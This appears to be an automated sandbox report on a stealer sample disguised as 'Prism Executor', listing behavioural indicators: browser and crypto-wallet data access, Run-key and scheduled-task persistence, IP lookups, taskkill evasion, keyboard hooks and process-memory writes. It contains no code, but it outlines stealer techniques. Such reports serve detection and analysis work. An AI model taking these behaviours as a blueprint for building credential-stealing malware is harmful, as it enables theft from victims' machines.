N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" C:\Users\Admin\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133629245470406342" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows Runtime.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3204 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3204 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3204 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3204 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3204 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3204 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3204 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 3204 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 3204 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 3204 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 1564 wrote to memory of 3832 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe
PID 1564 wrote to memory of 3832 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe
PID 2916 wrote to memory of 3644 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3644 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 4916 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 4916 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 4960 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 4960 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3384 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3384 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 1680 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 2916 wrote to memory of 1680 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 2688 wrote to memory of 4004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 4004 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2688 wrote to memory of 2548 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
